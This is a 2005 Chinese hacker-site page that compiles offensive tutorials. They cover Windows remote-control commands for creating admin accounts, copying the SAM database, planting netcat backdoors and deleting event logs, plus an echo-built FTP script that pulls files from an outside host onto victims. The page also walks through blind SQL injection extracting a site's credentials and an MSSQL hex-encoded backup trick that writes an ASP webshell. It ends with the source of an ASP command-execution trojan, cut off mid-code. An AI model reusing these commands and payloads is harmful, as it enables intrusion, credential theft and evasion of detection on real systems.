你好,游客 登录 搜索网站地图
背景:
阅读新闻

黑客常用的远程控制命令,想学黑客,不记得这些,没门.......

[日期:2005-01-20] 来源:本站原创  作者:笑看红尘 [字体: ]


以下是黑客常用的远程控制命令,想学黑客,不记得这些,没门.......

--------------------------------------------------------------------------------

1:NET

只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!

这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1    

net use \\127.0.0.1\ipc$ "123456" /user:"hbx"

退出的命令是

net use \\127.0.0.1\ipc$ /delte

下面的操作你必须登陆后才可以用.登陆的方法就在上面.

----------------------

下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.

我们加一个heibai的用户密码为lovechina

net user heibai lovechina /add

只要显示命令成功,那么我们可以把他加入Administrator组了.

net localgroup Administrators heibai /add

----------------------

这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.

net use z:\\127.0.0.1\c$

----------------------

net start telnet

这样可以打开对方的TELNET服务.

----------------------

这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。

net user guest /active:yes

----------------------

这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!

net user guest lovechina

net命令果然强大啊!

2:at

一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?

那么需要用AT命令,这里假设你已经登陆了那个服务器。

你首先要得到对方的时间,

net time \\127.0.0.1

将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1

at \\127.0.0.1 12:3 nc.exe 严志梁

这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.

这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.

3:telnet

这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.

telnet 127.0.0.1 99

这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.

4:FTP

它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个WWW.51.NET,不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器.

在上传前需要登陆先,这里我们假设FTP服务器是WWW.51.NET,用户名是HUCJS,密码是654321

ftpwww.51.net

他会要求输入用户,成功后会要求输入密码.

----------------------

下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\

get c:\index.htm d:\

假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下

put c:\index.htm d:\

5:copy

下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。

这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下

copy index.htm \\127.0.0.1\c$\index.htm

----------------------

如果你要复制到D盘下把C改为D,就行了!

copy index.htm \\127.0.0.1\d$\index.htm

----------------------

如果你要把他复制到WINNT目录里

就要把输入

copy index.htm \\127.0.0.1\admin$\index.htm

admin$是winnt

----------------------

要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名

下面就把127.0.0.1的数据库复制到本地C盘下

copy \\127.0.0.1\admin$\repair\sam._ c:\

----------------------

6:set

如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!

下面是我得到的结果!我来分析它,只是找主页在那而已。

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。

7:nbtstat

如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!

现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。

命令是

nbtstat -A XX.XX.XX.XX

-A一定要大写哦。

下面是得到的结果。

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP


粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用户。

这里的用户是PENTIUMII。

8:Shutdown

关了对方的NT服务器的命令

Shutdown \\IP地址 t:20

20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。

9:DIR

这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。

你可以本地试下。

10:echo

著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。

我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。

echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm

echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm

第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。

第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。

“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。

大家可以本地试下。

可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。

1、首先,我们需要申请一个免费的主页空间。

2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.htm c:\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)

具体的做法:
输入 echo open upload.chinaren.com> c:\cnhack.txt
输入 echo cnhack >> c:\cnhack.txt
输入 echo 39abs >> c:\cnhack.txt
输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最后输入 ftp -s:c:\cnhack.txt (利用ftp的-s参数,执行文件里的内容。)

等命令完成时,文件已经下载到你指定的文件里了。

注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)

记得要 del c:\cnhack.txt

11:attrib

这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。

attrib -r index.htm

这个命令是把index.htm的只读属性去掉。

如果把“-”改为“+”则是把这个文件的属性设置为只读

----------------------

attrib +r index.htm

这个命令是把index.htm的属性设置为只读。

12el

当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。

NT的日志有这些

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改成其他盘。

--------------------------------------------------------------------------------

 

这次讲流光的使用.......

流光这款软件除了能够像X-Scan那样扫描众多漏洞、弱口令外,还集成了常用的入侵工具,如字典工具、NT/IIS工具等,还独创了能够控制“肉鸡”进行扫描的“流光Sensor工具”和为“肉鸡”安装服务的“种植者”工具。

 


与X-Scan相比,流光的功能多一些,但操作起来难免繁杂。由于流光的功能过于强大,而且功能还在不断扩充中,因此流光的作者小榕限制了流光所能扫描的IP范围,不允许流光扫描国内IP地址,而且流光测试版在功能上也有一定的限制。但是,入侵者为了能够最大限度地使用流光,在使用流光之前,都需要用专门的破解程序对流光进行破解,去除IP范围和功能上的限制。

安装与打补丁完成后,打开流光,界面如图1-65所示。

 

 

实例:使用流光高级扫描功能检测210.□.□.2到210.□.□.253网段主机的系统缺陷
步骤一:打开高级扫描向导、设置扫描参数。

在流光4.7主界面下,通过选择“文件(F)”→“高级扫描向导(W)”或使用快捷健“Ctrl+W”打开高级扫描向导。在“起始地址”和“结束地址”分别填入目标网段主机的开始和结束IP地址;在“目标系统”中选择预检测的操作系统类型;在“获取主机名”、“PING检查”前面打钩;在“检测项目”中,选择“全选”;选好后如图1-66所示。

 

 

图1-66

然后单击“下一步(N)”按钮,在图1-67中选中“标准端口扫描”。

 


图1-67

说明:

“标准端口扫描”:只对常见的端口进行扫描。

“自定端口扫描范围”:自定义端口范围进行扫描。

然后单击“下一步(N)”按钮,在图1-68中进行设置。

 

 

图1-68

设置好所有检测项目后,然后单击“下一步(N)”按钮来到图1-69界面,选择“本地主机”,表示使用本机执行扫描任务。

 

 

图1-69

步骤二:开始扫描。

在图1-69中单击“开始(S)”按钮进行扫描。在扫描过程中,如果想要停止,通过单击最下角的“取消”按钮来实现,不过需要相当一段时间才能真正地停止,所以建议一次不要扫太大的网段,如果因扫描时间过长而等不及,这时候再想让流光停下来是不容易的。

步骤三:查看扫描报告。

扫描结束后,流光会自动打开HTML格式的扫描报告,如图1-70所示。

 

 

图1-70

需要指出的是,在扫描完成后,流光不仅把扫描结果整理成报告文件,而且还把可利用的主机列在流光界面的最下方,如图1-71所示。

 

 

图1-71

单击主机列表中的主机便可以直接对目标主机进行连接操作,如图1-72所示。

 

 

图1-72

除了使用“高级扫描向导”配置高级扫描外,还可以直接选取高级扫描工具,如图1-73所示。

 

 

图1-73

打开“高级扫描设置”,其界面如图1-74所示。

 

 

图1-74

关于流光的使用就介绍到这里,本节中所介绍的只是流光功能的一小部分,其他一些功能会在以后的实例中逐一介绍。流光扫描器自身的设置是比较复杂的,有很多选项可以自由设定,因而也给使用者更大的发挥空间,可以根据网络和机器的状况来尝试改变这些设置,提高扫描器的性能,而且流光中还有详细的FAQ问题解答。

 

 
 
    
 

 

黑客必需学会怎么使用代理,如果你不想被发现的话........

今天我们全面向大家介绍有关代理服务器设置方面的知识

 也许说起代理服务器,有一些电脑使用经验的朋友一定不陌生。通过代理服务器,可以让我们访问、登陆正常情况下所无法查看的网站等。今天我们就全面的向大家介绍有关代理服务器设置方面的知识。

1、Internet Explorer

  IE浏览器可以说是我们在网上生活中使用最广泛的工具之一了。但是很多单位(尤其是学校)都是教育网内部用户,上网费用都是按流量计算,因此一般都禁止访问国外站点,并且在技术上进行了拦截。而如果我们使用了外面的代理服务器则可克服这个问题。

  启动Internet Explorer,打开“工具”菜单,选择“Internet选项”,在打开的对话框中切换到“连接”选项卡(如图1),首先根据自己网络的连接类型,即是否是拨号网络用户还是局域网用户,例如我是局域网用户,那么就点击局域网设置按钮打开如图2所示的对话框,选中“为LAN使用代理服务器”选项,然后在后面输入代理服务器地址和端口。保存设置之后,我们再访问网站的时候,都会自动先访问该代理服务器地址,然后由其去读取访问地址的内容存放到代理服务器上,最后再返回访问用户,说到这里,可能细心的用户就发现一个问题,那就是通过代理服务器访问可以有效的提高访问速度,因为他在某种程度上来说跟本地计算机上的缓存的功能有点相似。

 

 

 

 


2、QQ设置

  很多单位为了保证部门在上班时间不使用QQ聊天而影响工作,都要求网管关闭了相应的端口以限制登陆QQ。而腾讯公司则给会员提供了能过HTTP代理直接访问,这样只要能够访问网页,就能使用QQ。但是对于很多人来说并不愿意交纳每个月十元的会员费,那么这就要求我们自己来设置代理服务器了。

  打开QQ,运行登录向导对话框,进行到网络设置界面的时候(如图3),选中“使用Socks5”代理,然后输入相应的地址和端口号,如果需要密码的可以输入用户名和密码,并且进行测试。而如果在本台计算机上以前使用过QQ,那么在选择QQ号码,直接输入用户口令登录不成功的时候,我们可以右击灰色的小企鹅图标,在打开的菜单中选择“系统设置”,然后切换到“网络设置”选项卡(如图4),选中使用“Socks5代理服务器”,进行同样的设置也可以。

 

 

 

 

3、MSN

  与IE访问国外站点相似,如果网站限制访问,那么我们的MSN也将不能使用。而如果不能使用MSN,怎么和朋友进行交流呢?这样,代理服务器又派上用场了。打开“工具”菜单下的“选项”,切换到“连接”选项卡,选中“我使用代理服务器”,然后选择代理服务器类型、地址以及端口号等内容,设置好之后保存设置的内容就可以了(如图5)。

 

 

4、Foxmail

  Foxmail是我们经常使用的一款邮件处理程序,在一些特殊的环境下我们同样需要使用代理服务器来进行。启动Foxmail之后,打开“选项”菜单下的“系统设置”,切换到“代理”选项卡,选中“邮件代理服务器”选项,并进行相关的设置就可以了。是不是很简单(如图6)。

 

 

5、网络蚂蚁

  网络蚂蚁(NetAnts)是一款非常优秀的断点续传的下载软件。为了能够下载国外站点的内容,我们同样需要设置代理服务器。启动该软件,选择“选项”菜单下的“参数设置”项,在打开的对话框中切换到“代理”选项卡,点击“添加”按钮,打开代理设置对话框,首先选择代理的类型,然后输入代理的地址、端口号,至于名称倒可以随便写一个就可以了。做好这一切,保存设置同样就可以完成设置(如图7)。

 

 

6、Windows Media Player
 
  可能你没有想到为播放软件还能设置使用代理服务器?其实我们经常需要使用它来实现在线收看一些实况转播、在线电影,这样就不可避免的涉及到代理服务器的应用了。选择“工具”菜单下的“选项”,在打开的窗口中切换到“网络”选项卡,点击代理服务器区域的配置按钮,打开配置协议对话框,选中“使用以下代理服务器”选项,然后输入相应的代理服务器地址和端口(如图8)。

 

 

  怎么样,通过上面的介绍,你对代理服务器的设置与使用有没有一点了解呢!下面是我搜索整理的一些代理服务器地址,希望能对大家有所帮助。

  地址: 端口:
  63.109.68.68 80
  218.145.25.109 8081
  202.99.22.16 80
  199.86.76.234 80
  193.112.136.7 80
  203.130.134.131 8080

 

菜鸟攻击之从SA到3389实现过程

1你已经扫到SA弱口令(这个就不用我教了吧,扫描软件很多)

2使用SqlExec连接工具,连接成功后,使用如下命令


net user hejiudeyu /add
net user hejiudeyu good
net localgroup administrators hejiudeyu /add

命令的说明:第1行,添加hejiudeyu用户,

第2行,把hejiudeyu的密码设置成good。

第3行,把hejiudeyu用户提升到管理组。


3利用net start telnet命令开启telnet服务。

(这里涉及到NTLM验证,如果不明白,请看我以前的菜鸟之总结解决NTLM验证的方法,这篇文章)

4 telnet到对方的机器,见个批处理文件3389(有人已经总结了开3389的5种方法)

具体的命令如下:
C:\>copy con 3389.bat
echo [components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
用ctrl+Z结束,然后运行这个批处理文件
等一会,机器就重起了,如果在重起过程中没有被管理员发现,恭喜你,你应该获得了1台肉鸡。

5用mstsc(工具)连接

 

sql注入攻击

org漏洞描述:
1.寻找入口
准备:如果你以前没尝试过SQL注入攻击,那应该把HTTP友好提示关闭,这样才能让你清楚看到服务器端返回的提示信息。
尝试几个有传入参数的页面,逐个测试是否有SQL注入漏洞,识别方法为:把网址栏的ID=***x加个'号,或在表单输入'号,如果提示表达式错误,表示有漏洞可注入,另外,通过这个方式可以得到程序所用的数据库类型。
经测试,发现有几个页面有注入漏洞,决定从http://www.movie.com/movie.asp?ID=1000入手,输入http://www.movie.com/movie.asp?ID=1000',得到信息:数据库用是的ACCESS,提示ArticleID=1000'附近有表达式错误,嘿,原来是个用文章系统改出来的电影站。

2.观察网站环境
网站提供的功能有:影片分类、影片介绍、影片搜索,影片的ID大概从1000-1500之间。

3.猜表名
查清楚敌人情况之后,开始行动,行动的第一步都是从猜表名开始,http://www.movie.com/movie.asp?ID=1000,把1000改成(select count(1) from user),那么,他原来的SQL语句将会变成:
Select [字段列表] from [影片表] where 影片ID=(select count(1) from user)
如果猜对表名,将有可能出现下面三种情况:
A.显示某部影片的信息(巧合的情况)
B.显示影片找不到(如果有判断是否为EOF)
C.提示错误信息(EOF OR BOF)
如果猜错,将会直接提示找不到表名。
把user,users,member,members,userlist,memberlist,userinfo,admin,manager,用户,yonghu这些常用表名一个个放进去试,一般成功率都不低于80%
结果,成功猜中该网站的用户名表名为users

4.猜列名
至于猜列名,不用我介绍大家都应该清楚怎么做了,把(select count(1) from users)改成(select count(id) from users),如没提示"找不到字段"就表示字段名是正确的,字段一般不用太费力,在Login的时候看看表单的名称就大概可以猜到一些了。
果然,这个网站也不例外,用户表中字段为ID(数字),UserID(文本),Password(文本),积分字段猜得比较费劲,为money

5.锁定目标
让users表只返回money最多的一个记录,以便进行猜解、并避免猜中一些没money的用户名:
http://www.movie.com/movie.asp?ID=(select 1000 from user where money>1000) 结果:提示子查询不能返回两条以上记录
锁定>10000,提示不变;
锁定>100000,提示找不到记录,说明没有积分大于10万的用户;
从1万到10万逐步缩小范围,得知积分大于25500只有一条记录。

6.计算用户名及密码长度
因为影片的ID大概从1000-1500之间,可以用UserID的长度+1000得出的数(即影片ID)计算用户名长度,键入:
http://www.movie.com/movie.asp?ID=(select len(UserID) %2B 1000 from user where money>25500)

%2B是什么?因为地址栏的+号request出来会变成空格,所以+号要用UrlEncode过的%2B表示。

结果返回片名为《双雄》的影片,呵呵,怎么办?不是有搜索功能吗?拿去搜一下,看看影片ID是多少吧。
搜索,得出影片ID是1006,显然,用户名长度为1006-1000=6;同样方法,得出密码的长度为8

7.分步破解用户名
有点SQL应用经验的人应该都想到方法了,来,敲入:
http://www.movie.com/movie.asp?ID=(select asc(mid(UserID,1,1)) %2B 1000 from user where money>25500)
呵呵,又返回一部影片,搜索一下,影片ID为1104,即asc(mid(UserID,1,1))=104
同样方法,得出:
asc(mid(UserID,2,1))=117
asc(mid(UserID,3,1))=97
asc(mid(UserID,4,1))=106
asc(mid(UserID,5,1))=105
asc(mid(UserID,6,1))=101
因为len(UserID)=6,所以算到第6位就行了,查asc对应表(会编程的可以写几句话算出来),chr(104)=h,chr(117)=u,chr(97)=a,chr(106)=j,chr(105)=i,chr(101)=e
连起来,用户名就是huajie

8.同样的方法破解密码
asc(mid(Password,1,1))=49 => chr(49)=1
asc(mid(Password,2,1))=57 => chr(49)=9
asc(mid(Password,3,1))=55 => chr(49)=7
asc(mid(Password,4,1))=56 => chr(49)=8
asc(mid(Password,5,1))=48 => chr(49)=0
asc(mid(Password,6,1))=55 => chr(49)=7
asc(mid(Password,7,1))=55 => chr(49)=1
asc(mid(Password,8,1))=55 => chr(49)=2
拼起来:19780712,哈哈,又是用生日做密码的!


接下来,输入用户名和密码,登录系统,成功!猜表名列表之前用了30分钟,破解用了15分钟,45分钟搞掂了一个站。接下来做什么?当然是先Down几G的电影下来再说了。

 
 
--------------------------------------------------------------------------------

 
上次只是进了盘,虽然能干一些事,但总不能直接运行,好吧,那我们种一个马(本例是blackphoenix推荐使用的蓝色火焰0.5 preview 2版,可以下载区下载)
首先,我们用扫描器扫到了这么一台机,有着[nt-server弱口令],如图

 


哈哈,因为要简单起见,所以我就不用什么net use \\ip\admin$ "" /user:"admin"
之类的命令了,因为要简单嘛,不过你们一定要记住哦
好了,不说废话,打开流光,在“工具”里的“nt....."里的种值者,如下图
 

 

 

运行后,我们写上ip地址和我们扫出来的用户名及密码,以及我们的可爱的马马
如下图

 

 

 
这时,会提示我们60秒后会运行,现在,无聊就用net time \\ip 来看时间打发时间吧
好了,时间到了(不要问我为什么说时间到了,因为60秒已经过去了)
然后,因为我们上传的是telnet木马,所以,就用telnet连接它吧
如下图

 

 


连上来啦,接下来,你就干自己的事吧

 


不过上传一个灰鸽子也是不错的选择哦

 


利用SuperScan检测网络安全


作者: TechRepublic.com
Friday, September 3 2004 2:50 PM SuperScan是由Foundstone开发的一款免费的,但功能十分强大的工具,与许多同类工具比较,它既是一款黑客工具,又是一款网络安全工具。一名黑客可以利用它的拒绝服务攻击(DoS,denial of service)来收集远程网络主机信息。而做为安全工具,SuperScan能够帮助你发现你网络中的弱点。下面我将为你介绍从哪里得到这款软件并告诉你如何使用它。 
 

如何获得SuperScan
SuperScan4.0是免费的,并且你可以在如下地址下载:
http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&subcontent=/resources/proddesc/superscan.htm

这是一个196kb的Zip压缩包。因为SuperScan有可能引起网络包溢出,所以Foundstone站点声明某些杀毒软件可能识别SuperScan是一款拒绝服务攻击(Dos)的代理。

SuperScan4.0只能在Windows XP或者Windows 2000上运行。对一些老版本的操作系统,你必须下载SuperScan3.0版。

 

SuperScan的使用
给SuperScan解压后,双击SuperScan4.exe,开始使用。打开主界面,默认为扫描(Scan)菜单,允许你输入一个或多个主机名或IP范围。你也可以选文件下的输入地址列表。输入主机名或IP范围后开始扫描,点Play button,SuperScan开始扫描地址,如下图A。

 

 

图A:SuperScan允许你输入要扫描的IP范围。

扫描进程结束后,SuperScan将提供一个主机列表,关于每台扫描过的主机被发现的开放端口信息。SuperScan还有选择以HTML格式显示信息的功能。如图B。

 

 

图B:SuperScan显示扫描了哪些主机和在每台主机上哪些端口是开放的。

关于主机和服务器扫描设置(Host and Service Discovery)
到目前为止,从以上的例子,你已经能够从一群主机中执行简单的扫描,然而,很多时候需要你定制扫描。如图C上看到的Host and Service Discovery 选项。这个选项让你在扫描的时候看到的更多信息。

 

 

图C:Host and Service Discovery 决定具体哪些端口被扫描。

在菜单顶部是Host Discovery项。默认的,发现主机的方法是通过重复请求(echo requests)。通过选择和取消各种可选的扫描方式选项,你也能够通过利用时间戳请求(timestamp),地址屏蔽请求(address mask requests)和消息请求(information requests)来发现主机。紧记,你选择的选项越多,那么扫描用的时间就越长。如果你正在试图尽量多的收集一个明确的主机的信息,建议你首先执行一次常规的扫描以发现主机,然后再利用可选的请求选项来扫描。

在菜单的底部,包括UDP端口扫描和TCP端口扫描项。通过屏幕的截图,注意到SuperScan最初开始扫描的仅仅是那几个最普通的常用端口。原因是有超过65000个的TCP和UDP端口。若对每个可能开放端口的IP地址,进行超过130000次的端口扫描,那将需要多长的时间。因此SuperScan最初开始扫描的仅仅是那几个最普通的常用端口,但给你扫描额外端口的选项。

关于扫描选项(Scan Options)
Scan Options项,如图D所示,允许进一步的控制扫描进程。菜单中的首选项是定制扫描过程中主机和通过审查的服务数。1是默认值,一般来说足够了,除非你的连接不太可靠。

 

 

图D:在Scan Options项中,能够控制扫描速度和通过扫描的数量。

Scan Options中的接下来的选项,能够设置主机名解析的数量。同样,数量1足够了,除非你的连接不可靠。

另一个选项是获取标志(Banner Grabbing)的设置,Banner Grabbing是根据显示一些信息尝试得到远程主机的回应。默认的延迟是8000毫秒,如果你所连接的主机较慢,这个时间就显的不够长。

旁边的滚动条是扫描速度调节选项,能够利用它来调节SuperScan在发送每个包所要等待的时间。最快的可能扫描,当然是调节滚动条为0。可是,扫描速度设置为0,有包溢出的潜在可能。如果你担心由于SuperScan引起的过量包溢出,你最好调慢SuperScan的速度。

关于工具(Tools)选项
SuperScan的工具选项(Tools)是我比较喜欢的选项之一。它允许你很快的得到许多关于一个明确的主机信息。正确输入主机名或者IP地址和默认的连接服务器,然后点击你要得到相关信息的按纽。如,你能ping一台服务器,或traceroute,和发送一个HTTP请求。图E显示了得到的各种信息。

 

 

图E:能够通过点选不同的按纽,收集各种主机信息。

关于Windows枚举选项(Windows Enumeration)
最后的功能选项是Windows枚举选项,就象你大概猜测的一样,如果你设法收集的信息是关于Linux/UNIX主机的,那这个选项是没什么用的。但若你需要Windows主机的信息,它确实是很方便的。如图F所示,能够提供从单个主机到用户群组,再到协议策略的所有信息。这个选项给人的最深刻的印象是它产生大量的透明信息。

 

 

图F:Windows枚举选项能够产生关于Windows主机的大量信息。

总结
SuperScan是每个网络管理员必须具备的几种工具之一,作为安全审核工具包的一部分。如果你知道黑客能够看到你网络中的哪些信息,那么你将知道如何减轻众多的潜在攻击,并有效保护公司的重要资产


 
 
   

Mssql Backup a Shell 突破特殊字符

1.插入数据

mssql注射使用Backup或makewebtask得到webshell,在写入webshell代码时,如果过滤了一些特殊字符,如" '等。我们先mssql分析器里“查询”:

use pubs; <===使用数据哭pubs
create table cmd (str image); <===建立个表cmd 一个属性为image的列
insert into cmd (str) values ('<%execute request("cmd")&""%>') <===插入数据为 <%execute request("cmd")&""%>
select * from cmd; <===查询输出cmd里的所有数据

查询输出str为:
0x3C256578656375746520726571756573742822636D642229262222253E

我们不管插入str什么数据,在数据库里会自动转为hex编码,那么我们可以直接在上面的sql语句里insert into 的数据改为hex编码:

use pubs
create table cmd (str image)
insert into cmd(str) values(0x3C256578656375746520726571756573742822636D642229262222253E)
select * from cmd

查询输出str为:
0x3C256578656375746520726571756573742822636D642229262222253E

什么2种方法得到的结果一样,但是第2种方法里插入的数据,就没有' " &等等。

2.导出路径

常规的插入数据后导出webshell的语句为:

backup database model to disk='g:\wwwtest\l.asp';

显然导出路径里包涵了' : \等,我们照样可以使用hex编码来突破:

declare @a sysname
select @a=0x673A5C777777746573745C6C2E617370 <====0x673A5C777777746573745C6C2E617370为g:\wwwtest\l.asp对应的hex代码
backup database pubs to disk=@a

运行查询,可以成功导出webshell。

3.小结:

结合1,2我们可以得到完整的导出webshell的sql语句格式为:

use model
create table cmd (str image)
insert into cmd(str) values(0x***********)
declare @a sysname select @a=0x********** backup database pubs to disk=@a

其实使用hex等编码的方法,在angel的文章〈饶过'(单引号)限制继续射入〉里提过,我只是照搬而已,你也可以搬到其他地方去拉:).

4.查考文章:
《饶过'(单引号)限制继续射入》http://www.4ngel.net/article/14.htm
《在MSSQL下实现Backup a shell》http://safer.cnwill.com/show.php?id=469
转hex脚本(aschex.pl) http://www.4ngel.net/project/aschex.txt


 
 
   


用asp木马实现ftp和解压缩

我想大家都有一些开了80端口的肉鸡吧,如果是国内的出于安全就不要往下看了,如果不不妨往下看一下,小弟献丑了,以求抛砖引玉.
在肉鸡上放网站最麻烦的可能就是更新和上传大量的文件了,终端服务大白天容易被发现,自己开个ftp又不放心.自己在网上转了一圈发现通过结合无组件上传和asp木马可以轻松实现.
asp木马大家都很熟悉,无非就是一个cmd,有什么作用啊,你别急,听我慢慢说嘛.整体思路就是先通过ftp,139,或者winshell上传一个无组件asp程序.我选择了化境的webedit(其实这个已经不是一个单纯的无组件上传的工具了,通过它还可以修改,删除文件/目录,可以用来更新页面喔,作起来广告了,我跟他没亲戚啊,闪过一个flying bottle..继续)和一个asp木马(如果,实在懒得找.最后带着源码,粘贴另存为asp文件即可),记住可都要在肉鸡的web目录喔.其实大多的问题webedit都可以解决,不过如果有很多文件一个一个上传可就麻烦了,怎么办?这下asp木马用上了.找一个rar.exe(所有装过了winrar的目录都有,说不定肉鸡上已经安好了,如果是别的命令行的解压缩工具也可以喔)把它拷到%SystemRoot%\system32\下.上传.zip或者.rar文件到该肉鸡的web目录.在浏览器地址栏里打开asp木马(暂时称之为trojan.asp),在text文本框里输入rar -x source.rar path解压缩成功,V,且慢如何得到web目录的绝对路径(path)呢?我用的是用土方法,修改trojan.asp加入一行转换虚拟目录成绝对路径并输出的语句<% =server.mappath(".") %>,"."可以随意改成任何的相对虚拟目录.
 只是提供一个思路,如果哪个牛人可写一个asp的解压缩那更好喽,不过?谁会呢,我不会,你会吗?至于如何隐藏虚拟目录,支持简体中文显示等就不是该篇的讨论之列了,老话,安全第一,一般放个小的论坛或聊天室就可以了,如果真放个个人主页,还把自己的联系地址,电话号码也留给人家就不太好了.ps.junesun建议直接作成自解压,不知会不会弹出对话框。
--------以下是asp木马的源码,建议在<html>后加上<% =server.mappath(".") %>------------------------------
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile

On Error Resume Next

' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

' -- check for a command that we have posted -- '
szCMD = Request.form(".CMD")
If (szCMD <> "") Then

